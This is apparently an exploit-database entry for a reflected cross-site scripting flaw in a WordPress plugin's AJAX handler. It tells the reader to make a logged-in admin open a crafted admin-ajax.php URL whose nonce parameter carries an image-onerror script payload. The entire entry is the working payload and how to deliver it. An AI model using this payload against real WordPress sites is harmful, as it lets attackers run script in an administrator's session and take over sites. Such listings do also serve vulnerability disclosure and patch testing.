Share
## https://sploitus.com/exploit?id=WPEX-ID:C9D80AA4-A26D-4B3F-B7BF-9D2FB0560D7B
Make a logged in admin open the URL below

https://example.com/wp-admin/admin-ajax.php?action=asl_ajax_handler&asl-nounce=<img src onerror=alert`XSS`>